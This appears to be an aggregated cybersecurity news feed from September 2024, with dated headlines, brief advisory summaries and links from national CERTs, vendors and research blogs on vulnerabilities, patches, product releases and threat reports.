National Coordination Centre for Cyber Security Research, Development and Innovation (NCC-FI) together with partners organized an International Matchmaking Event on Cyber Calls at the beginning of September. The event offered information on the current EU funding opportunities as well as insight on current cyber security phenomena. The participants had the opportunity to ask questions from the experts and network with each other.

https://www.kyberturvallisuuskeskus.fi/en/news/international-matchmaking-event-cyber-calls-offered-information-and-opportunities-network
Announcing the Trail of Bits and Semgrep partnership
2024-09-19T13:00:30Z | 1726750830

At Trail of Bits, we aim to share and develop tools and resources used in our security assessments with the broader security community. Many clients, we observed, don’t use Semgrep to its fullest potential or even at all. To bridge this gap and encourage broader adoption, our CEO, Dan Guido, initiated discussions with the Semgrep […]

https://blog.trailofbits.com/2024/09/19/announcing-the-trail-of-bits-and-semgrep-partnership/
CVE-2024-22170
2024-09-19T08:55:00Z | 1726736100

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Western Digital MyCloud PR4100. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of HTTP responses provided to the ddns-start program. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the device. My Cloud OS 5 Firmware 5.29.102 includes updates to help improve the security of your My Cloud OS 5 devices.

https://claroty.com/team82/disclosure-dashboard/cve-2024-22170
High Threat Security Alert (A24-09-16): Multiple Vulnerabilities in VMware Products
2024-09-19T04:00:00Z | 1726718400

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-09-17): Vulnerability in GitLab
2024-09-19T04:00:00Z | 1726718400

GitLab has released 16.11.10, 17.0.8, 17.1.8, 17.2.7 and 17.3.3 to address a security restriction bypass vulnerability in various versions of GitLab.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-09-18): Multiple Vulnerabilities in Apple iOS and iPadOS
2024-09-19T04:00:00Z | 1726718400

Apple has released iOS 17.7, iOS 18, iPadOS 17.7 and iPadOS 18 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-09-19): Multiple Vulnerabilities in Google Chrome
2024-09-19T04:00:00Z | 1726718400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Cursos CERT.br: Agenda 2025
2024-09-18T13:00:00Z | 1726664400

Estão disponíveis a agenda e valores dos cursos para 2025: https://cursos.cert.br/ A abertura das inscrições será em 23 de janeiro de 2025.

https://cursos.cert.br/
Cato CTRL Threat Research: CVE-2023-49559 – gqlparser Directive Overload DoS Vulnerability
2024-09-18T12:20:00Z | 1726662000

Executive Summary  The Cato CTRL and Cato Application Security Research teams recently discovered CVE-2023-49559, a directive overload Denial of Service (DoS) vulnerability in the gqlparser library, which is a crucial component in the development and running of GraphQL applications. The vulnerability is of medium severity (CVSS score of 5.3).  The gqlparser library is an integrated... The post Cato CTRL Threat Research: CVE-2023-49559 – gqlparser Directive Overload DoS Vulnerability  appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-ctrl-threat-research-cve-2023-49559-gqlparser-directive-overload-dos-vulnerability/
National Cyber Security Centre's weekly review – 37/2024
2024-09-18T08:55:45Z | 1726649745

M365 credentials are now being actively phished for, in particular through the Dropbox service. Please be careful with files you receive from Dropbox.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-372024
National Cyber Security Centre's weekly review – 37/2024
2024-09-18T08:55:45Z | 1726649745

M365 credentials are now being actively phished for, in particular through the Dropbox service. Please be careful with files you receive from Dropbox.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-372024
RIA kinnitab: Eesti veebilehti kaitsev tarkvaralahendus on turvaline
2024-09-18T06:35:16Z | 1726641316

Riigi infosüsteemi amet (RIA) kinnitab vastuseks ajalehes Postimees 18. septembril ilmunud väidetele, et Eesti veebilehti ummistusrünnete (DDoS) eest kaitsev tarkvaralahendus ei sea kasutajate andmeid ohtu.

https://ria.ee/uudised/ria-kinnitab-eesti-veebilehti-kaitsev-tarkvaralahendus-turvaline
Eesti on üks maailma kõige küberturvalisemaid riike
2024-09-18T06:19:50Z | 1726640390

ÜRO Rahvusvahelise Telekommunikatsiooni Liidu värske küberturvalisuse raport paigutab Eesti kõige edukamate riikide hulka.

https://ria.ee/uudised/eesti-uks-maailma-koige-kuberturvalisemaid-riike
OpenPLC OpenPLC_v3 OpenPLC Runtime EtherNet/IP parser stack-based buffer overflow vulnerability
2024-09-18T00:00:00Z | 1726617600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2005
OpenPLC OpenPLC_v3 OpenPLC Runtime EtherNet/IP parser invalid pointer dereference vulnerabilities
2024-09-18T00:00:00Z | 1726617600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2016
OpenPLC OpenPLC_v3 OpenPLC Runtime EtherNet/IP PCCC out-of-bounds read vulnerability
2024-09-18T00:00:00Z | 1726617600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2004
Inside DEF CON: Michael Brown on how AI/ML is revolutionizing cybersecurity
2024-09-17T13:00:08Z | 1726578008

At DEF CON, Michael Brown, Principal Security Engineer at Trail of Bits, sat down with Michael Novinson from Information Security Media Group (ISMG) to discuss four critical areas where AI/ML is revolutionizing security. Here’s what they covered: AI/ML techniques surpass the limits of traditional software analysis As Moore’s law slows down after 20 years of […]

https://blog.trailofbits.com/2024/09/17/inside-def-con-michael-brown-on-how-ai-ml-is-revolutionizing-cybersecurity/
Joe Sandbox v41 Charoite
2024-09-17T11:49:00Z | 1726573740

Today, we are proud to release Joe Sandbox 41 under the code name Charoite! This release is packed with many new detection signatures and important features to make Joe Sandbox even better.Our Joe Sandbox Cloud Pro, Basic, and OEM servers have recently been upgraded to Charoite.If you wish to upgrade your on-premise Joe Sandbox installation, please follow the instructions in the chapter on "Updating" in the user guide which you find in our customer portal. 307 new SignaturesCharoite comes with a very large number of new Yara and Behavior signatures to detect new malware families like SpiceRAT, Diamorphine, AlphaSeed, Mallox, HZ Rat, CTHULHU STEALER, Banshee, Stealer, BeaverTail, CVE-2024-7262, SMERT, Kematian Stealer, Cronus, ByteVaultX,LethalLock and many more. In addition, we added 13 new Malware Configuration Extractors, e.g. for Meterpreter, Xehookstealer, Warmcookie, Ztrat, Urelas, Atlantidastealer, Donex, Vipkeylogger, Evilproxy, Greatnessphishingkit, Simdastealer, Coppershrimp and Originbotnet, to name a few. We also started adding config extractors for Phishing PaaS such as Tycoon2FA:Full Analysis Report.COM tracingVBS, JS and VBA files often use COM (component object model) calls to perform malicious actions. COM calls are difficult to trace but with Joe Sandbox v41 malware analysts can see all COM calls performed by a suspicious process. Let us have a look at this VBA file:It is highly obfuscated. Therefore its purpose is hard to understand. COM calls can be found in the COM Activities: Looking at the calls we instantly find that the script calls the Windows Scripting Host Run function in order to call Powershell. Full Analysis report.Suricata IntegrationWe have integrated Suricata IDS into Joe Sandbox Charoite. Suricata replaces Snort, as it offers superior performance in malware analysis, with better handling of complex traffic patterns and improved detection capabilities.Key Highlights are :Suricata scans network traffic in all analyses across all architectures, also during Live Interaction.Easily enable the Emerging Threat OPEN or PRO ruleset for immediate and up-to-date threat detection .Possibility to add your own Suricata custom rules (see web app: Editor > Suricata).Rules which hit are shown in the Network Behavior - Suricata IDS Alerts and Suricata Signatures:Full Analysis Report.Browser Javascript ReportBesides malicious software, phishing is one of biggest threat for enterprises. Hence phishing detection plays a key at Joe Security. Most phishing pages use suspicious Javascript code. With v41 we introduce a new report which makes all executed Javascript code available to the malware analyst:Full Analysis Report.Final WordsIn this blog post, we have presented the most important features of Joe Sandbox Charoite, but there are some other interesting features on top:Added 1 new string extractorAdded API for security logAdded coverage for NtQueueApcThreadEx2Added coverage for connect, nanosleep, shutdown, reboot, truncate on LinuxImproved Firefox performanceImproved prevention of various VM detectionsImproved phishing detectionImproved QR code detection & extractionImproved process whitelistingImproved URL analysis link selectionWould you like to try Joe Sandbox? Register for a free account on Joe Sandbox Cloud Basic or contact us for an in-depth technical demo!

https://www.joesecurity.org/blog/7254488342111981700
Beware the Rising Tide: Financial Services Is Awash in Attacks
2024-09-17T10:30:00Z | 1726569000

https://www.akamai.com/blog/security-research/2024/sep/financial-services-is-awash-in-attacks
Protective Monitoring for HMG ICT Systems (GPG 13)
2024-09-17T06:55:09Z | 1726556109

Please note that this document is out of date and is provided for historical reference only. It should not be used in the design and operation of new systems.

https://www.ncsc.gov.uk/guidance/protective-monitoring-hmg-ict-systems-gpg-13
Modernizing Enterprise Security for An Application-Centric World
2024-09-16T13:00:00Z | 1726491600

https://www.akamai.com/blog/security/2024/sep/modernizing-enterprise-security-application-centric-world
Cybercheck: Beware of supply chain risks
2024-09-16T08:02:00Z | 1726473720

To ensure asecure, digital functioning Dutch society, it is crucial that organizations are aware of risks within their supply chain. This applies especially  for public and private organizations that have so-called Protectable Interests (Te Beschermen Belangen  in Dutch) with regard to National Security (hereinafter abbreviated to PI-NS, the acronym is ‘TBB-NV’ in Dutch). To assist these organizations, the General Intelligence and Security Service (AIVD), Chief Information Office Rijk (CIO Rijk), National Cyber Security Center NCSC and National Coordinator for Counterterrorism and Security (NCTV) have developed the Cybercheck: a guide that helps to identify potential supply chain risks resulting from the use of products and services originating from countries with an offensive cyber programme.

https://english.ncsc.nl/latest/news/2024/september/16/cybercheck-beware-of-supply-chain-risks
Transitive Access Abuse - Data Exfiltration via Document AI by Kat Traxler
2024-09-16T00:00:00Z | 1726444800

The Document AI service unintentionally allows users to read any Cloud Storage object in the same project and write to an attacker-controlled location.

https://www.vectra.ai/blog/transitive-access-abuse-data-exfiltration-via-document-ai
30-60-90 Day CISO eBook
2024-09-15T11:27:05Z | 1726399625

The post 30-60-90 Day CISO eBook appeared first on Cato Networks.

https://www.catonetworks.com/resources/30-60-90-day-ciso-ebook/
Hillstone CloudArmour: Comprehensive Cloud Workload Protection Platform
2024-09-13T14:36:11Z | 1726238171

As workloads expand from traditional physical appliance-based or virtual machine-based to the modern container-based or serverless in public, private, hybrid, and even multi-cloud environments, security protection and risk management on cloud platforms must now span development and runtime. CloudArmour provides deep visibility of the cloud workloads with full security control, allowing organizations to comprehensively understand […] The post Hillstone CloudArmour: Comprehensive Cloud Workload Protection Platform appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/resources/hillstone-cloudarmour-comprehensive-cloud-workload-protection-platform/
Akamai?s Perspective on September?s Patch Tuesday 2024
2024-09-13T14:00:00Z | 1726236000

https://www.akamai.com/blog/security-research/2024/sep/akamai-perspective-patch-tuesday-september-2024
Friends don’t let friends reuse nonces
2024-09-13T13:00:54Z | 1726232454

If you’ve encountered cryptography software, you’ve probably heard the advice to never use a nonce twice—in fact, that’s where the word nonce (number used once) comes from. Depending on the cryptography involved, a reused nonce can reveal encrypted messages, or even leak your secret key! But common knowledge may not cover every […]

https://blog.trailofbits.com/2024/09/13/friends-dont-let-friends-reuse-nonces/
Akamai Prevents DDoS Attack on Major U.S. Customer
2024-09-13T13:00:00Z | 1726232400

https://www.akamai.com/blog/security/2024/sep/akamai-prevents-record-breaking-ddos-attack-major-us-customer
High Threat Security Alert (A24-09-14): Multiple Vulnerabilities in GitLab
2024-09-13T04:00:00Z | 1726200000

GitLab has released 17.1.7, 17.2.5 and 17.3.2 to address multiple vulnerabilities in various versions of GitLab.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-09-15): Multiple Vulnerabilities in Microsoft Edge
2024-09-13T04:00:00Z | 1726200000

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Vectra AI Named Leader in NDR by SOC Teams by Nicole Drake
2024-09-13T00:00:00Z | 1726185600

Vectra AI has been recognized by GigaOM and peer recognized in Gartner Peer Insights Report (separately through their own decision processes) for Vectra ND

https://www.vectra.ai/blog/vectra-ai-named-leader-in-ndr-by-soc-teams
How Distributed Cloud Computing Meets Modern User Demand
2024-09-12T13:00:00Z | 1726146000

Learn why distributed cloud computing is essential to meet user demand for highly customized, secure services.

https://www.akamai.com/blog/cloud/2024/sep/how-distributed-cloud-computing-meets-modern-user-demand
Algab Eesti.ee mobiilirakenduse avalik testimine
2024-09-12T11:37:48Z | 1726141068

Alates tänasest on kõigil huvilistel võimalus registreerida end Eesti.ee mobiilirakenduse testijaks ja proovida esimesena uut riigiäppi.

https://ria.ee/uudised/algab-eestiee-mobiilirakenduse-avalik-testimine
ESG Watch | September 2024
2024-09-12T08:57:58Z | 1726131478

Key news in this edition: South African advertising regulator makes first ‘greenwashing ruling’. UK announces plans for new regulations on ESG rating agencies. Luxury fashion brands targeted by Italian regulators for labour exploitation in their supply chains. editorial   In both the UK and Africa the ESG regulatory environment is continuing to develop. The UK is progressing plans for regulating ESG ratings agencies, a long overdue move that will bring the UK in line with European standards and start to bring some needed consistency and transparency to ESG ratings. Although the African ESG regulatory landscape is less developed, a new greenwashing ruling by the South African Advertising Regulatory Board shows how ESG accountability can be administered in creative ways. As expected, supply chains are also coming under greater scrutiny ahead of the CSDDD. In Italy we are seeing an investigative and judicial focus on ensuring that domestic firms are holding their suppliers to account for labour practices in the supply chain.

https://www.s-rminform.com/esg-watch/esg-watch-september-2024
Detection of Fog Ransomware Footprint in Cyber Space of Bangladesh
2024-09-12T08:08:34Z | 1726128514

The Bangladesh e-Government Computer Incident Response Team (BGD e-GOV CIRT) has identified multiple IP addresses linked to the Fog Ransomware group (aka Lost in Fog) within Bangladesh. These addresses appear to originate from Russia, suggesting that the attackers might be operating from or routing their activities through that region. However, the exact location of the attackers remains uncertain due to their use of advanced masking... Read More

https://www.cirt.gov.bd/fog-ransomware-footprint-in-bd/
Augustis korraldati kaks lunavararünnakut ja levitati massiliselt õngitsusi
2024-09-12T07:57:12Z | 1726127832

Riigi Infosüsteemi Ameti (RIA) kuuülevaatest selgub muu hulgas, et augustis toimus Eestis kaks lunavararünnakut, turvanõrkust ära kasutades tungiti Transpordiameti süsteemi ja Omniva nime kuritarvitades saadeti massiliselt õngitsussõnumeid.

https://ria.ee/uudised/augustis-korraldati-kaks-lunavararunnakut-ja-levitati-massiliselt-ongitsusi
The Imperative of Data Loss Prevention in the AI-Driven Enterprise
2024-09-12T06:24:25Z | 1726122265

As organizations increasingly integrate artificial intelligence (AI) into their operations, the nature of data security is undergoing significant transformation. With AI’s ability to process vast amounts of data quickly, the risk of data breaches and leaks has grown exponentially. In this context, Data Loss Prevention (DLP) has (re)emerged as a critical component for IT professionals... The post The Imperative of Data Loss Prevention in the AI-Driven Enterprise  appeared first on Cato Networks.

https://www.catonetworks.com/blog/data-loss-prevention-in-the-ai-driven-enterprise/
Security Alert (A24-09-13): Multiple Vulnerabilities in Cisco Products
2024-09-12T04:00:00Z | 1726113600

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Microsoft High Definition Audio Bus Driver HDAudBus_DMA multiple irp complete requests vulnerability
2024-09-12T00:00:00Z | 1726099200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2008
Near and Long-term Directions for Adversarial AI in Cybersecurity by Sohrob Kazerounian
2024-09-12T00:00:00Z | 1726099200

AI in cybersecurity enhances human capabilities and uncovers hidden threats—while raising the inevitable reality that attackers will also weaponize AI.

https://www.vectra.ai/blog/near-and-long-term-directions-for-adversarial-ai-in-cybersecurity
The Role of State-Sponsored Actors in Election Interference
2024-09-12T00:00:00Z | 1726099200

Explore the critical role of state-sponsored actors in election interference in part two of our "Understanding the Election Cybersecurity Landscape" series. Learn about their tactics, such as cyberespionage and disinformation, and how they undermine democratic processes. Discover effective countermeasures to safeguard elections and protect public trust.

https://www.greynoise.io/blog/the-role-of-state-sponsored-actors-in-election-interference
Hillstone Networks Recognized in the Latest Analyst Report for Microsegmentation Solutions
2024-09-11T18:30:47Z | 1726079447

SANTA CLARA, Calif., September 11, 2024 /PRNewswire/ — Hillstone Networks, a global leader in cybersecurity solutions, has been recognized in The Forrester Wave™: Microsegmentations Solutions, Q3 2024 report for its advanced microsegmentation offerings, including CloudHive and CloudArmour. The assessment considered 23 criteria to evaluate microsegmentation solution providers. This analysis included identifying, researching, analyzing, and rating the most significant […] The post Hillstone Networks Recognized in the Latest Analyst Report for Microsegmentation Solutions appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/company/press-releases/hillstone-networks-recognized-in-the-latest-analyst-report-for-microsegmentation-solutions/
National Cyber Security Centre's weekly review – 36/2024
2024-09-11T12:20:08Z | 1726057208

This week's topics include tips regarding playing online safely for both children and parents and information about bot networks.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-362024
National Cyber Security Centre's weekly review – 36/2024
2024-09-11T12:20:08Z | 1726057208

This week's topics include tips regarding playing online safely for both children and parents and information about bot networks.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-362024
Riasztás Microsoft termékeket érintő sérülékenységekről – 2024. szeptember
2024-09-11T11:49:32Z | 1726055372

A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki a Microsoft szoftvereket érintő kritikus kockázati besorolású sérülékenységek kapcsán, azok súlyossága, kihasználhatósága és a szoftverek széleskörű elterjedtsége miatt.

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-microsoft-termekeket-erinto-serulekenysegekrol-2024-szeptember/
High Threat Security Alert (A24-09-08): Multiple Vulnerabilities in Microsoft Products (September 2024)
2024-09-11T04:00:00Z | 1726027200

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-09-09): Multiple Vulnerabilities in Ivanti Products
2024-09-11T04:00:00Z | 1726027200

Ivanti has released security advisories to address multiple vulnerabilities in Ivanti products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-09-10): Multiple Vulnerabilities in Google Chrome
2024-09-11T04:00:00Z | 1726027200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-09-11): Multiple Vulnerabilities in Adobe Reader/Acrobat
2024-09-11T04:00:00Z | 1726027200

Patches are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-09-12): Multiple Vulnerabilities in Fortinet Products
2024-09-11T04:00:00Z | 1726027200

Fortinet released security advisories to address multiple vulnerabilities in Fortinet systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Microsoft Windows 10 AllJoyn Router Service information disclosure vulnerability
2024-09-11T00:00:00Z | 1726012800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1980
CrowdStrike and Vectra AI Bring the Power of Modern Security to Fal.Con 2024 by Zoey Chu
2024-09-11T00:00:00Z | 1726012800

Discover how Vectra AI and CrowdStrike collaborate at Fal.Con 2024 to address modern security challenges with next-gen SIEM and AI-driven network telemetry.

https://www.vectra.ai/blog/crowdstrike-and-vectra-ai-bring-the-power-of-modern-security-to-fal-con-2024
The Total Economic Impact Of Mastercard’s Threat Protection Solution
2024-09-10T19:25:25Z | 1725996325

The Threat Protection platform, previously Baffin Bay Networks, equips organizations to counter cyber risks including bot and DDoS attacks.

https://blog.riskrecon.com/resources/reports-and-whitepapers/the-total-economic-impact-of-mastercards-threat-protection-solution
AI and IoT: Everything You Need to Know
2024-09-10T15:00:00Z | 1725980400

Artificial intelligence and the Internet of Things are converging to revolutionize connectivity and security. Maximize their potential by taking stock of the benefits and risks that each offer. The post AI and IoT: Everything You Need to Know  appeared first on The Meraki Blog.

https://meraki.cisco.com/blog/2024/09/ai-and-iot-everything-you-need-to-know/
Threats and key takeaways for the legal sector
2024-09-10T13:48:36Z | 1725976116

New NCSC report outlines the growing threat to the legal sector, with recommendations to improve cyber resilience.

https://www.ncsc.gov.uk/blog-post/threats-and-key-takeaways-for-the-legal-sector
NCSC launches Cyber Incident Exercising scheme
2024-09-10T13:36:50Z | 1725975410

New CIE assured providers give organisations support to create structured table-top or live-play cyber incident exercises.

https://www.ncsc.gov.uk/news/ncsc-launches-cyber-incident-exercising-scheme
Sanitize your C++ containers: ASan annotations step-by-step
2024-09-10T13:00:42Z | 1725973242

AddressSanitizer (ASan) is a compiler plugin that helps detect memory errors like buffer overflows or use-after-frees. In this post, we explain how to equip your C++ code with ASan annotations to find more bugs. We also show our work on ASan in GCC and LLVM. In LLVM, Trail of […]

https://blog.trailofbits.com/2024/09/10/sanitize-your-c-containers-asan-annotations-step-by-step/
How to Detect Suspicious API Traffic
2024-09-10T13:00:00Z | 1725973200

https://www.akamai.com/blog/security/2024/sep/how-to-detect-suspicious-api-traffic
Vulnerabilities in MegaBIP software
2024-09-10T11:00:00Z | 1725966000

2 new vulnerabilities (CVE-2024-6662 and CVE-2024-6880) have been found in MegaBIP software.

https://cert.pl/en/posts/2024/09/CVE-2024-6662/
UK and allies uncover Russian military unit carrying out cyber attacks and digital sabotage for the first time
2024-09-10T07:44:33Z | 1725954273

The NCSC and partners call out Russian GRU cyber actors Unit 29155 for campaign of malicious cyber activity since at least 2020.

https://www.ncsc.gov.uk/news/uk-allies-uncover-russian-military-carrying-out-cyber-attacks-digital-sabotage
Adobe Acrobat Reader Annotation Object Page Race Condition Vulnerability
2024-09-10T00:00:00Z | 1725926400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2011
Unpatched Vulnerability in TI WooCommerce Wishlist Plugin
2024-09-09T17:45:04Z | 1725903904

A Few weeks ago an Sql Injection was discovered in the TI WooCommerce Wishlist plugin. After checking closer we found another entry point, affecting over 100,000 active installs. Despite the severity of this issue, the vendor have not yet provided a patch, leading to public disclosure. The vulnerability can be exploited by unauthenticated users, allowing […]

https://wpscan.com/blog/unpatched-vulnerability-in-ti-woocommerce-wishlist-plugin/
How to Reduce API Sprawl with API Discovery
2024-09-09T13:00:00Z | 1725886800

https://www.akamai.com/blog/security/2024/sep/reduce-api-sprawl-with-api-discovery
The Retail Industry’s Need for a True SASE Platform
2024-09-09T09:22:28Z | 1725873748

In today’s rapidly evolving retail landscape, where digital transformation is no longer a choice but a necessity, the importance of a robust and agile network and security infrastructure cannot be overstated. Retailers face a multitude of challenges, from managing vast networks across geographically dispersed locations to safeguarding sensitive customer data in an increasingly complex threat... The post The Retail Industry’s Need for a True SASE Platform  appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-retail-industrys-need-for-a-true-sase-platform/
Hillstone Networks is Included for the Second Consecutive Year in Gartner Peer Insights™ Voice of the Customer for Network Detection and Response
2024-09-09T07:28:01Z | 1725866881

SANTA CLARA, Calif.,— Hillstone Networks, a leading provider of cybersecurity solutions, was recognized as a Strong Performer in the 2024 Voice of the Customer for Network Detection and Response (NDR) report. In an environment where cybersecurity has become a critical priority for businesses, Hillstone Networks has emerged as an innovative leader with its Breach Detection System (BDS), […] The post Hillstone Networks is Included for the Second Consecutive Year in Gartner Peer Insights™ Voice of the Customer for Network Detection and Response appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/company/press-releases/hillstone-networks-is-included-for-the-second-consecutive-year-in-gartner-peer-insights-voice-of-the-customer-for-network-detection-and-response/
National Cyber Security Centre's weekly review – 35/2024
2024-09-09T06:37:03Z | 1725863823

This week we welcome new schoolchildren on the digital education path and tell you about the reform in which Microsoft will introduce a two-step login process to improve the security of logging into services and the management of services.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-352024
National Cyber Security Centre's weekly review – 35/2024
2024-09-09T06:37:03Z | 1725863823

This week we welcome new schoolchildren on the digital education path and tell you about the reform in which Microsoft will introduce a two-step login process to improve the security of logging into services and the management of services.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-352024
Security Alert (A24-09-07): Multiple Vulnerabilities in QNAP Products
2024-09-09T04:00:00Z | 1725854400

QNAP has published security advisories to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
“Unstripping” binaries: Restoring debugging information in GDB with Pwndbg
2024-09-06T13:00:21Z | 1725627621

GDB loses significant functionality when debugging binaries that lack debugging symbols (also known as “stripped binaries”). Function and variable names become meaningless addresses; setting breakpoints requires tracking down relevant function addresses from an external source; and printing out structured values involves staring at a memory dump trying to manually discern field boundaries. […]

https://blog.trailofbits.com/2024/09/06/unstripping-binaries-restoring-debugging-information-in-gdb-with-pwndbg/
What would you do with that old GPU?
2024-09-05T13:00:11Z | 1725541211

(Would you get up and throw it away?) [sing to the tune of The Beatles – With A Little Help From My Friends] Here’s a riddle: when new GPUs are constantly being produced, product cycles are ~18-24 months long, and each cycle doubles GPU power (per Huang’s Law), what […]

https://blog.trailofbits.com/2024/09/05/what-would-you-do-with-that-old-gpu/
5 Reasons Why You Need API Discovery
2024-09-05T13:00:00Z | 1725541200

https://www.akamai.com/blog/security/2024/aug/5-reasons-why-you-need-api-discovery
Riigiportaal on nüüd micro-frontend võimekusega
2024-09-05T09:11:35Z | 1725527495

Riigi Infosüsteemi Amet (RIA) viis eesti.ee portaali uuele mikroesitluskihi (micro-frontend ehk MFE) lahendusele. See uuendus võimaldab avalike teenuste omanikel kuvada oma mikroesitluskihil loodud teenuseid riigiportaalis tehniliselt kaasaegse ja turvalise raami ehk kestrakenduse kaudu, mis sisaldab päist, jalust ja vasakmenüüd. Lõppkasutaja jaoks jäi portaali visuaalne vaade ja funktsionaalsus samaks.

https://ria.ee/uudised/riigiportaal-nuud-micro-frontend-voimekusega
Flying Under the Radar – Security Evasion Techniques
2024-09-05T06:16:53Z | 1725517013

The post Flying Under the Radar – Security Evasion Techniques  appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-flying-under-the-radar
Security Alert (A24-09-04): Multiple Vulnerabilities in Cisco Products
2024-09-05T04:00:00Z | 1725508800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-09-05): Multiple Vulnerabilities in Firefox
2024-09-05T04:00:00Z | 1725508800

Mozilla has published the advisories (MFSA2024-39, MFSA2024-40 and MFSA2024-41) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-09-06): Vulnerability in OpenSSL
2024-09-05T04:00:00Z | 1725508800

OpenSSL has released 3.0.15, 3.1.7, 3.2.3 and 3.3.2 to fix the vulnerability in various versions of OpenSSL.

https://www.govcert.gov.hk/en/alerts_detail.php
Red Flag Bulletin | September 2024 | UK Financial Conduct Authority fines PwC
2024-09-04T10:04:26Z | 1725444266

This month’s top stories: Mozambique awarded USD 825 million in damages and indemnity on debt repayments totalling USD 1.5 billion in lawsuit related to decade-long ‘tuna bonds’ maritime corruption scandal;  UK Financial Conduct Authority imposes first fine on audit firm by fining PricewaterhouseCoopers LLP GBP 15 million for failing to report suspected fraudulent activity; and  Billionaire Carl Icahn and Icahn Enterprises agree to pay USD 2 million fine to settle charges filed by US Securities and Exchange Commission for failing to disclose pledging of securities as collateral.   Sub-saharan Africa  Mozambique: Judgements reached in two ‘tuna bonds’ maritime corruption scandal   The past month saw two significant legal judgements related to the ‘tunabonds’ scandal, a corruption scandal that has plagued the Mozambican maritime industry for over a decade. On 29 July, the UK Commercial Court awarded the Mozambican state USD 825 million in damages, and indemnity in respect of creditor repayments estimated at USD 1.5 billion, in a lawsuit against Privinvest Shipbuilding SAL, an Emirati-Lebanese shipbuilding company implicated in the scandal. Privinvest and its former CEO were found guilty of bribing Manuel Chang, the former Mozambican finance minister (2005-2015), to approve fraudulent loans in payment of maritime vessels supplied by Privinvest between 2013 and 2014. On 8 August, Chang was convicted of conspiracy to commit wire fraud and money laundering in a New York federal court, for having received USD 7 million in bribes from Privinvest to approve the afore-mentioned loans.   Senegal: Commission established to review hydrocarbon contracts awarded to foreign investors On 20 August, Senegal’s recently elected Prime Minister, Ousmane Sonko, announced that the Senegalese government had set up a commission to review oil and gas contracts awarded to foreign investors. This move forms part of the economic reforms being undertaken by the new administration of President Bassirou Diomaye Faye, who assumed office in April 2024. The commission’s review will reportedly examine contracts held by several prominent oil and gas companies, such as Kosmos Energy Ltd and Woodside Energy Group Ltd. The commission consists of legal, tax, and energy experts, who will examine these contracts with the aim of rebalancing them in the country’s national interest. Sonko emphasised that the Senegalese government is not planning to nationalise its hydrocarbon resources, but rather that the commission will identify key areas of the contracts which can be renegotiated in the country’s favour.

https://www.s-rminform.com/red-flag-bulletin/september-2024
High Threat Security Alert (A24-09-01): Vulnerability in VMware Fusion
2024-09-04T04:00:00Z | 1725422400

VMware has published a security advisory to address a vulnerability in VMware Fusion.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-09-02): Multiple Vulnerabilities in Google Chrome
2024-09-04T04:00:00Z | 1725422400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-09-03): Multiple Vulnerabilities in Android
2024-09-04T04:00:00Z | 1725422400

Google has released Android Security Bulletin September 2024 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Introducing the URL validation bypass cheat sheet
2024-09-03T14:52:12Z | 1725375132

URL validation bypasses are the root cause of numerous vulnerabilities including many instances of SSRF, CORS misconfiguration, and open redirection. These work by using ambiguous URLs to trigger URL

https://portswigger.net/research/introducing-the-url-validation-bypass-cheat-sheet
How to Implement Zero Trust on a Budget
2024-09-03T13:00:00Z | 1725368400

https://www.akamai.com/blog/security/2024/sep/implement-zero-trust-on-a-budget
We Just Made the Vectra AI Platform Even Better by Gearóid Ó Fearghaíl
2024-09-03T00:00:00Z | 1725321600

